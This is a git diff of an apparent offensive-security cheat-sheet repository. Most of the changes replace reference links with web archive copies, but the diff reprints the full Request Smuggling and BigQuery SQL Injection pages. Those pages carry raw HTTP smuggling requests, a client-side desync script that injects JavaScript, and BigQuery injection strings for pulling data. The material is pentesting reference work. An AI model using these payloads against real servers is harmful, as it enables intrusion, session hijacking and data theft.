+- [Turbo Intruder: Embracing the billion-request attack - James Kettle (@albinowax) - January 25, 2019](https://web.archive.org/web/20190929052757/https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
diff --git a/Regular Expression/README.md b/Regular Expression/README.md
index c9009b0..6db5343 100644
--- a/Regular Expression/README.md	
+++ b/Regular Expression/README.md	
@@ -70,8 +70,8 @@ if (preg_match($pattern, $subject)) {
 
 ## References
 
-* [Intigriti Challenge 1223 - Hackbook Of A Hacker - December 21, 2023](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
-* [MyBB Admin Panel RCE CVE-2023-41362 - SorceryIE - September 11, 2023](https://blog.sorcery.ie/posts/mybb_acp_rce/)
-* [OWASP Validation Regex Repository - OWASP - March 14, 2018](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
-* [PCRE > Installing/Configuring - PHP Manual - May 3, 2008](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)
-* [Regular expression Denial of Service - ReDoS - Adar Weidman - December 4, 2019](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
+* [Intigriti Challenge 1223 - Hackbook Of A Hacker - December 21, 2023](https://web.archive.org/web/20260210185049/https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
+* [MyBB Admin Panel RCE CVE-2023-41362 - SorceryIE - September 11, 2023](https://web.archive.org/web/20251115110845/https://blog.sorcery.ie/posts/mybb_acp_rce/)
+* [OWASP Validation Regex Repository - OWASP - March 14, 2018](https://web.archive.org/web/20241005224013/https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
+* [PCRE > Installing/Configuring - PHP Manual - May 3, 2008](https://web.archive.org/web/20260219065508/https://www.php.net/manual/en/pcre.configuration.php)
+* [Regular expression Denial of Service - ReDoS - Adar Weidman - December 4, 2019](https://web.archive.org/web/20200309080846/https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md
index 1b28934..a287d73 100644
--- a/Request Smuggling/README.md	
+++ b/Request Smuggling/README.md	
@@ -1,181 +1,181 @@
-# Request Smuggling
-
-> HTTP Request smuggling occurs when multiple "things" process a request, but differ on how they determine where the request starts/ends. This disagreement can be used to interfere with another user's request/response or to bypass security controls. It normally occurs due to prioritising different HTTP headers (Content-Length vs Transfer-Encoding), differences in handling malformed headers (eg whether to ignore headers with unexpected whitespace), due to downgrading requests from a newer protocol, or due to differences in when a partial request has timed out and should be discarded.
-
-## Summary
-
-* [Tools](#tools)
-* [Methodology](#methodology)
-    * [CL.TE Vulnerabilities](#clte-vulnerabilities)
-    * [TE.CL Vulnerabilities](#tecl-vulnerabilities)
-    * [TE.TE Vulnerabilities](#tete-vulnerabilities)
-    * [HTTP/2 Request Smuggling](#http2-request-smuggling)
-    * [Client-Side Desync](#client-side-desync)
-* [Labs](#labs)
-* [References](#references)
-
-## Tools
-
-* [bappstore/HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) - An extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks
-* [defparam/Smuggler](https://github.com/defparam/smuggler) - An HTTP Request Smuggling / Desync testing tool written in Python 3
-* [dhmosfunk/simple-http-smuggler-generator](https://github.com/dhmosfunk/simple-http-smuggler-generator) - This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs.
-
-## Methodology
-
-If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as PortSwigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`.
-
-### CL.TE Vulnerabilities
-
-> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
-
-```powershell
-POST / HTTP/1.1
-Host: vulnerable-website.com
-Content-Length: 13
-Transfer-Encoding: chunked
-
-0
-
-SMUGGLED
-```
-
-Example:
-
-```powershell
-POST / HTTP/1.1
-Host: domain.example.com
-Connection: keep-alive
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 6
-Transfer-Encoding: chunked
-
-0
-
-G
-```
-
-### TE.CL Vulnerabilities
-
-> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
-
-```powershell
-POST / HTTP/1.1
-Host: vulnerable-website.com
-Content-Length: 3
-Transfer-Encoding: chunked
-
-8
-SMUGGLED
-0
-```
-
-Example:
-
-```powershell
-POST / HTTP/1.1
-Host: domain.example.com
-User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
-Content-Length: 4
-Connection: close
-Content-Type: application/x-www-form-urlencoded
-Accept-Encoding: gzip, deflate
-
-5c
-GPOST / HTTP/1.1
-Content-Type: application/x-www-form-urlencoded
-Content-Length: 15
-x=1
-0
-
-
-```
-
-:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence `\r\n\r\n` following the final 0.
-
-### TE.TE Vulnerabilities
-
-> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
-
-```powershell
-Transfer-Encoding: xchunked
-Transfer-Encoding : chunked
-Transfer-Encoding: chunked
-Transfer-Encoding: x
-Transfer-Encoding:[tab]chunked
-[space]Transfer-Encoding: chunked
-X: X[\n]Transfer-Encoding: chunked
-Transfer-Encoding
-: chunked
-```
-
-## HTTP/2 Request Smuggling
-
-HTTP/2 request smuggling can occur if a machine converts your HTTP/2 request to HTTP/1.1, and you can smuggle an invalid content-length header, transfer-encoding header or new lines (CRLF) into the translated request. HTTP/2 request smuggling can also occur in a GET request, if you can hide an HTTP/1.1 request inside an HTTP/2 header
-
-```ps1
-:method GET
-:path /
-:authority www.example.com
-header ignored\r\n\r\nGET / HTTP/1.1\r\nHost: www.example.com
-```
-
-## Client-Side Desync
-
-On some paths, servers don't expect POST requests, and will treat them as simple GET requests, ignoring the payload, eg:
-
-```ps1
-POST / HTTP/1.1
-Host: www.example.com
-Content-Length: 37
-
-GET / HTTP/1.1
-Host: www.example.com
-```
-
-could be treated as two requests when it should only be one. When the backend server responds twice, the frontend server will assume only the first response is related to this request.
-
-To exploit this, an attacker can use JavaScript to trigger their victim to send a POST to the vulnerable site:
-
-```javascript
-fetch('https://www.example.com/', {method: 'POST', body: "GET / HTTP/1.1\r\nHost: www.example.com", mode: 'no-cors', credentials: 'include'} )
-```
-
-This could be used to:
-
-* get the vulnerable site to store a victim's credentials somewhere the attacker can access it
-* get the victim to send an exploit to a site (eg for internal sites the attacker cannot access, or to make it harder to attribute the attack)
-* to get the victim to run arbitrary JavaScript as if it were from the site
-
-**Example**:
-
-```javascript
-fetch('https://www.example.com/redirect', {
-    method: 'POST',
-        body: `HEAD /404/ HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /x?x=<script>alert(1)</script> HTTP/1.1\r\nX: Y`,
-        credentials: 'include',
-        mode: 'cors' // throw an error instead of following redirect
-}).catch(() => {
-        location = 'https://www.example.com/'
-})
-```
-
-This script tells the victim browser to send a `POST` request to `www.example.com/redirect`. That returns a redirect which is blocked by CORS, and causes the browser to execute the catch block, by going to `www.example.com`.
-
-`www.example.com` now incorrectly processes the `HEAD` request in the `POST`'s body, instead of the browser's `GET` request, and returns 404 not found with a content-length, before replying to the next misinterpreted third (`GET /x?x=<script>...`) request and finally the browser's actual `GET` request.
-Since the browser only sent one request, it accepts the response to the `HEAD` request as the response to its `GET` request and interprets the third and fourth responses as the body of the response, and thus executes the attacker's script.
-
-## Labs
-
-* [PortSwigger - HTTP request smuggling, basic CL.TE vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te)
-* [PortSwigger - HTTP request smuggling, basic TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl)
-* [PortSwigger - HTTP request smuggling, obfuscating the TE header](https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header)
-* [PortSwigger - Response queue poisoning via H2.TE request smuggling](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling)
-* [PortSwigger - Client-side desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync/lab-client-side-desync)
-
-## References
-
-* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - October 16, 2020](https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling)
-* [Advanced Request Smuggling - PortSwigger - October 26, 2021](https://portswigger.net/web-security/request-smuggling/advanced#http-2-request-smuggling)
-* [Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling - James Kettle (@albinowax) - August 10, 2022](https://portswigger.net/research/browser-powered-desync-attacks)
-* [HTTP Desync Attacks: Request Smuggling Reborn - James Kettle (@albinowax) - August 7, 2019](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
-* [Request Smuggling Tutorial - PortSwigger - September 28, 2019](https://portswigger.net/web-security/request-smuggling)
+# Request Smuggling
+
+> HTTP Request smuggling occurs when multiple "things" process a request, but differ on how they determine where the request starts/ends. This disagreement can be used to interfere with another user's request/response or to bypass security controls. It normally occurs due to prioritising different HTTP headers (Content-Length vs Transfer-Encoding), differences in handling malformed headers (eg whether to ignore headers with unexpected whitespace), due to downgrading requests from a newer protocol, or due to differences in when a partial request has timed out and should be discarded.
+
+## Summary
+
+* [Tools](#tools)
+* [Methodology](#methodology)
+    * [CL.TE Vulnerabilities](#clte-vulnerabilities)
+    * [TE.CL Vulnerabilities](#tecl-vulnerabilities)
+    * [TE.TE Vulnerabilities](#tete-vulnerabilities)
+    * [HTTP/2 Request Smuggling](#http2-request-smuggling)
+    * [Client-Side Desync](#client-side-desync)
+* [Labs](#labs)
+* [References](#references)
+
+## Tools
+
+* [bappstore/HTTP Request Smuggler](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) - An extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks
+* [defparam/Smuggler](https://github.com/defparam/smuggler) - An HTTP Request Smuggling / Desync testing tool written in Python 3
+* [dhmosfunk/simple-http-smuggler-generator](https://github.com/dhmosfunk/simple-http-smuggler-generator) - This tool is developed for burp suite practitioner certificate exam and HTTP Request Smuggling labs.
+
+## Methodology
+
+If you want to exploit HTTP Requests Smuggling manually you will face some problems especially in TE.CL vulnerability you have to calculate the chunk size for the second request(malicious request) as PortSwigger suggests `Manually fixing the length fields in request smuggling attacks can be tricky.`.
+
+### CL.TE Vulnerabilities
+
+> The front-end server uses the Content-Length header and the back-end server uses the Transfer-Encoding header.
+
+```powershell
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 13
+Transfer-Encoding: chunked
+
+0
+
+SMUGGLED
+```
+
+Example:
+
+```powershell
+POST / HTTP/1.1
+Host: domain.example.com
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 6
+Transfer-Encoding: chunked
+
+0
+
+G
+```
+
+### TE.CL Vulnerabilities
+
+> The front-end server uses the Transfer-Encoding header and the back-end server uses the Content-Length header.
+
+```powershell
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 3
+Transfer-Encoding: chunked
+
+8
+SMUGGLED
+0
+```
+
+Example:
+
+```powershell
+POST / HTTP/1.1
+Host: domain.example.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86
+Content-Length: 4
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+5c
+GPOST / HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 15
+x=1
+0
+
+
+```
+
+:warning: To send this request using Burp Repeater, you will first need to go to the Repeater menu and ensure that the "Update Content-Length" option is unchecked.You need to include the trailing sequence `\r\n\r\n` following the final 0.
+
+### TE.TE Vulnerabilities
+
+> The front-end and back-end servers both support the Transfer-Encoding header, but one of the servers can be induced not to process it by obfuscating the header in some way.
+
+```powershell
+Transfer-Encoding: xchunked
+Transfer-Encoding : chunked
+Transfer-Encoding: chunked
+Transfer-Encoding: x
+Transfer-Encoding:[tab]chunked
+[space]Transfer-Encoding: chunked
+X: X[\n]Transfer-Encoding: chunked
+Transfer-Encoding
+: chunked
+```
+
+## HTTP/2 Request Smuggling
+
+HTTP/2 request smuggling can occur if a machine converts your HTTP/2 request to HTTP/1.1, and you can smuggle an invalid content-length header, transfer-encoding header or new lines (CRLF) into the translated request. HTTP/2 request smuggling can also occur in a GET request, if you can hide an HTTP/1.1 request inside an HTTP/2 header
+
+```ps1
+:method GET
+:path /
+:authority www.example.com
+header ignored\r\n\r\nGET / HTTP/1.1\r\nHost: www.example.com
+```
+
+## Client-Side Desync
+
+On some paths, servers don't expect POST requests, and will treat them as simple GET requests, ignoring the payload, eg:
+
+```ps1
+POST / HTTP/1.1
+Host: www.example.com
+Content-Length: 37
+
+GET / HTTP/1.1
+Host: www.example.com
+```
+
+could be treated as two requests when it should only be one. When the backend server responds twice, the frontend server will assume only the first response is related to this request.
+
+To exploit this, an attacker can use JavaScript to trigger their victim to send a POST to the vulnerable site:
+
+```javascript
+fetch('https://www.example.com/', {method: 'POST', body: "GET / HTTP/1.1\r\nHost: www.example.com", mode: 'no-cors', credentials: 'include'} )
+```
+
+This could be used to:
+
+* get the vulnerable site to store a victim's credentials somewhere the attacker can access it
+* get the victim to send an exploit to a site (eg for internal sites the attacker cannot access, or to make it harder to attribute the attack)
+* to get the victim to run arbitrary JavaScript as if it were from the site
+
+**Example**:
+
+```javascript
+fetch('https://www.example.com/redirect', {
+    method: 'POST',
+        body: `HEAD /404/ HTTP/1.1\r\nHost: www.example.com\r\n\r\nGET /x?x=<script>alert(1)</script> HTTP/1.1\r\nX: Y`,
+        credentials: 'include',
+        mode: 'cors' // throw an error instead of following redirect
+}).catch(() => {
+        location = 'https://www.example.com/'
+})
+```
+
+This script tells the victim browser to send a `POST` request to `www.example.com/redirect`. That returns a redirect which is blocked by CORS, and causes the browser to execute the catch block, by going to `www.example.com`.
+
+`www.example.com` now incorrectly processes the `HEAD` request in the `POST`'s body, instead of the browser's `GET` request, and returns 404 not found with a content-length, before replying to the next misinterpreted third (`GET /x?x=<script>...`) request and finally the browser's actual `GET` request.
+Since the browser only sent one request, it accepts the response to the `HEAD` request as the response to its `GET` request and interprets the third and fourth responses as the body of the response, and thus executes the attacker's script.
+
+## Labs
+
+* [PortSwigger - HTTP request smuggling, basic CL.TE vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te)
+* [PortSwigger - HTTP request smuggling, basic TE.CL vulnerability](https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl)
+* [PortSwigger - HTTP request smuggling, obfuscating the TE header](https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header)
+* [PortSwigger - Response queue poisoning via H2.TE request smuggling](https://portswigger.net/web-security/request-smuggling/advanced/response-queue-poisoning/lab-request-smuggling-h2-response-queue-poisoning-via-te-request-smuggling)
+* [PortSwigger - Client-side desync](https://portswigger.net/web-security/request-smuggling/browser/client-side-desync/lab-client-side-desync)
+
+## References
+
+* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - October 16, 2020](https://web.archive.org/web/20260111201639/https://www.cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling)
+* [Advanced Request Smuggling - PortSwigger - October 26, 2021](https://web.archive.org/web/20260228102047/https://portswigger.net/web-security/request-smuggling/advanced)
+* [Browser-Powered Desync Attacks: A New Frontier in HTTP Request Smuggling - James Kettle (@albinowax) - August 10, 2022](https://web.archive.org/web/20220810190719/https://portswigger.net/research/browser-powered-desync-attacks)
+* [HTTP Desync Attacks: Request Smuggling Reborn - James Kettle (@albinowax) - August 7, 2019](https://web.archive.org/web/20260228152820/https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn)
+* [Request Smuggling Tutorial - PortSwigger - September 28, 2019](https://web.archive.org/web/20190821011451/https://portswigger.net/web-security/request-smuggling)
diff --git a/Reverse Proxy Misconfigurations/README.md b/Reverse Proxy Misconfigurations/README.md
index 963390c..b972480 100644
--- a/Reverse Proxy Misconfigurations/README.md	
+++ b/Reverse Proxy Misconfigurations/README.md	
@@ -161,5 +161,5 @@ Because Caddy is running the templates directive, it will evaluate anything in c
 
 ## References
 
-* [What is X-Forwarded-For and when can you trust it? - Phil Sturgeonopens - January 31, 2024](https://httptoolkit.com/blog/what-is-x-forwarded-for/)
-* [Common Nginx misconfigurations that leave your web server open to attack - Detectify - November 10, 2020](https://blog.detectify.com/industry-insights/common-nginx-misconfigurations-that-leave-your-web-server-ope-to-attack/)
+* [What is X-Forwarded-For and when can you trust it? - Phil Sturgeonopens - January 31, 2024](https://web.archive.org/web/20260112224231/https://httptoolkit.com/blog/what-is-x-forwarded-for/)
+* [Common Nginx misconfigurations that leave your web server open to attack - Detectify - November 10, 2020](https://web.archive.org/web/20260227155031/https://blog.detectify.com/industry-insights/common-nginx-misconfigurations-that-leave-your-web-server-ope-to-attack/)
diff --git a/SAML Injection/README.md b/SAML Injection/README.md
index a7e4bb9..39d048d 100644
--- a/SAML Injection/README.md	
+++ b/SAML Injection/README.md	
@@ -187,14 +187,14 @@ Picture from [http://sso-attacks.org/XSLT_Attack](http://sso-attacks.org/XSLT_At
 
 ## References
 
-* [Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them - Jem Jensen - March 7, 2017](https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/)
-* [How to Hunt Bugs in SAML; a Methodology - Part I - Ben Risher (@epi052) - March 7, 2019](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
-* [How to Hunt Bugs in SAML; a Methodology - Part II - Ben Risher (@epi052) - March 13, 2019](https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
-* [How to Hunt Bugs in SAML; a Methodology - Part III - Ben Risher (@epi052) - March 16, 2019](https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)
-* [On Breaking SAML: Be Whoever You Want to Be - Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen - August 23, 2012](https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91-8-23-12.pdf)
-* [Oracle Weblogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933) - Denis Andzakovic - July 18, 2018](https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities)
-* [SAML Burp Extension - Roland Bischofberger - July 24, 2015](https://blog.compass-security.com/2015/07/saml-burp-extension/)
+* [Attacking SSO: Common SAML Vulnerabilities and Ways to Find Them - Jem Jensen - March 7, 2017](https://web.archive.org/web/20171113204302/https://blog.netspi.com/attacking-sso-common-saml-vulnerabilities-ways-find/)
+* [How to Hunt Bugs in SAML; a Methodology - Part I - Ben Risher (@epi052) - March 7, 2019](https://web.archive.org/web/20260119151024/https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)
+* [How to Hunt Bugs in SAML; a Methodology - Part II - Ben Risher (@epi052) - March 13, 2019](https://web.archive.org/web/20190511102027/https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/)
+* [How to Hunt Bugs in SAML; a Methodology - Part III - Ben Risher (@epi052) - March 16, 2019](https://web.archive.org/web/20250619124546/https://epi052.gitlab.io/notes-to-self/blog/2019-03-16-how-to-test-saml-a-methodology-part-three/)
+* [On Breaking SAML: Be Whoever You Want to Be - Juraj Somorovsky, Andreas Mayer, Jorg Schwenk, Marco Kampmann, and Meiko Jensen - August 23, 2012](https://web.archive.org/web/20130520064525/https://www.usenix.org/system/files/conference/usenixsecurity12/sec12-final91-8-23-12.pdf)
+* [Oracle Weblogic - Multiple SAML Vulnerabilities (CVE-2018-2998/CVE-2018-2933) - Denis Andzakovic - July 18, 2018](https://web.archive.org/web/20181221074856/https://pulsesecurity.co.nz/advisories/WebLogic-SAML-Vulnerabilities)
+* [SAML Burp Extension - Roland Bischofberger - July 24, 2015](https://web.archive.org/web/20260213191343/https://blog.compass-security.com/2015/07/saml-burp-extension/)
 * [SAML Security Cheat Sheet - OWASP - February 2, 2019](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SAML_Security_Cheat_Sheet.md)
-* [The road to your codebase is paved with forged assertions - Ioannis Kakavas (@ilektrojohn) - March 13, 2017](http://www.economyofmechanism.com/github-saml)
-* [Truncation of SAML Attributes in Shibboleth 2 - redteam-pentesting.de - January 15, 2018](https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-013/-truncation-of-saml-attributes-in-shibboleth-2)
-* [Vulnerability Note VU#475445 - Garret Wassermann - February 27, 2018](https://www.kb.cert.org/vuls/id/475445/)
+* [The road to your codebase is paved with forged assertions - Ioannis Kakavas (@ilektrojohn) - March 13, 2017](https://web.archive.org/web/20170314055835/http://www.economyofmechanism.com/github-saml)
+* [Truncation of SAML Attributes in Shibboleth 2 - redteam-pentesting.de - January 15, 2018](https://web.archive.org/web/20190607070528/https://www.redteam-pentesting.de/de/advisories/rt-sa-2017-013/-truncation-of-saml-attributes-in-shibboleth-2)
+* [Vulnerability Note VU#475445 - Garret Wassermann - February 27, 2018](https://web.archive.org/web/20180227170113/http://kb.cert.org/vuls/id/475445)
diff --git a/SQL Injection/BigQuery Injection.md b/SQL Injection/BigQuery Injection.md
index c0cc274..90742a1 100644
--- a/SQL Injection/BigQuery Injection.md	
+++ b/SQL Injection/BigQuery Injection.md	
@@ -1,64 +1,64 @@
-# Google BigQuery SQL Injection
-
-> Google BigQuery SQL Injection  is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
-
-## Summary
-
-* [Detection](#detection)
-* [BigQuery Comment](#bigquery-comment)
-* [BigQuery Union Based](#bigquery-union-based)
-* [BigQuery Error Based](#bigquery-error-based)
-* [BigQuery Boolean Based](#bigquery-boolean-based)
-* [BigQuery Time Based](#bigquery-time-based)
-* [References](#references)
-
-## Detection
-
-* Use a classic single quote to trigger an error: `'`
-* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
-
-| SQL Query                                             | Description |
-| ----------------------------------------------------- | -------------------- |
-| `SELECT @@project_id`                                 | Gathering project id |
-| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
-| `select * from project_id.dataset_name.table_name`    | Gathering data from specific project id & dataset |
-
-## BigQuery Comment
-
-| Type                       | Description                       |
-|----------------------------|-----------------------------------|
-| `#`                        | Hash comment                      |
-| `/* PostgreSQL Comment */` | C-style comment                   |
-
-## BigQuery Union Based
-
-```ps1
-UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
-true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
-true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
-' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
-```
-
-## BigQuery Error Based
-
-| SQL Query                                                | Description          |
-| -------------------------------------------------------- | -------------------- |
-| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero     |
-| `select CAST(@@project_id AS INT64)`                     | Casting              |
-
-## BigQuery Boolean Based
-
-```ps1
-' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
-```
-
-## BigQuery Time Based
-
-* Time based functions does not exist in the BigQuery syntax.
-
-## References
-
-* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
-* [BigQuery Documentation - Query Syntax - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
-* [BigQuery Documentation - Functions and Operators - October 30, 2024](https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
-* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
+# Google BigQuery SQL Injection
+
+> Google BigQuery SQL Injection  is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
+
+## Summary
+
+* [Detection](#detection)
+* [BigQuery Comment](#bigquery-comment)
+* [BigQuery Union Based](#bigquery-union-based)
+* [BigQuery Error Based](#bigquery-error-based)
+* [BigQuery Boolean Based](#bigquery-boolean-based)
+* [BigQuery Time Based](#bigquery-time-based)
+* [References](#references)
+
+## Detection
+
+* Use a classic single quote to trigger an error: `'`
+* Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
+
+| SQL Query                                             | Description |
+| ----------------------------------------------------- | -------------------- |
+| `SELECT @@project_id`                                 | Gathering project id |
+| `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names |
+| `select * from project_id.dataset_name.table_name`    | Gathering data from specific project id & dataset |
+
+## BigQuery Comment
+
+| Type                       | Description                       |
+|----------------------------|-----------------------------------|
+| `#`                        | Hash comment                      |
+| `/* PostgreSQL Comment */` | C-style comment                   |
+
+## BigQuery Union Based
+
+```ps1
+UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
+' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
+```
+
+## BigQuery Error Based
+
+| SQL Query                                                | Description          |
+| -------------------------------------------------------- | -------------------- |
+| `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero     |
+| `select CAST(@@project_id AS INT64)`                     | Casting              |
+
+## BigQuery Boolean Based
+
+```ps1
+' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
+```
+
+## BigQuery Time Based
+
+* Time based functions does not exist in the BigQuery syntax.
+
+## References
+
+* [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://web.archive.org/web/20260222133721/https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
+* [BigQuery Documentation - Query Syntax - October 30, 2024](https://web.archive.org/web/20251109151650/https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
+* [BigQuery Documentation - Functions and Operators - October 30, 2024](https://web.archive.org/web/20170524193028/https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
+* [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://web.archive.org/web/20260225150843/https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)
diff --git a/SQL Injection/Cassandra Injection.md b/SQL Injection/Cassandra Injection.md
index 6829353..66a7481 100644
--- a/SQL Injection/Cassandra Injection.md	
+++ b/SQL Injection/Cassandra Injection.md	
@@ -53,5 +53,5 @@ SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILT
 
 ## References
 
-* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
-* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra/)
+* [Cassandra injection vulnerability triggered - DATADOG - January 30, 2023](https://web.archive.org/web/20230130053010/https://docs.datadoghq.com/fr/security/default_rules/appsec-cass-injection-vulnerability-trigger/)
+* [Investigating CQL injection in Apache Cassandra - Mehmet Leblebici - December 2, 2022](https://web.archive.org/web/20251213065510/https://www.invicti.com/blog/web-security/investigating-cql-injection-apache-cassandra)
diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md
index 8511273..0928448 100644
--- a/SQL Injection/DB2 Injection.md	
+++ b/SQL Injection/DB2 Injection.md	
@@ -1,134 +1,134 @@
-# DB2 Injection
-
-> IBM DB2 is a family of relational database management systems (RDBMS) developed by IBM. Originally created in the 1980s for mainframes, DB2 has evolved to support various platforms and workloads, including distributed systems, cloud environments, and hybrid deployments.
-
-## Summary
-
-* [DB2 Comments](#db2-comments)
-* [DB2 Default Databases](#db2-default-databases)
-* [DB2 Enumeration](#db2-enumeration)
-* [DB2 Methodology](#db2-methodology)
-* [DB2 Error Based](#db2-error-based)
-* [DB2 Blind Based](#db2-blind-based)
-* [DB2 Time Based](#db2-time-based)
-* [DB2 Command Execution](#db2-command-execution)
-* [DB2 WAF Bypass](#db2-waf-bypass)
-* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
-* [References](#references)
-
-## DB2 Comments
-
-| Type                       | Description                       |
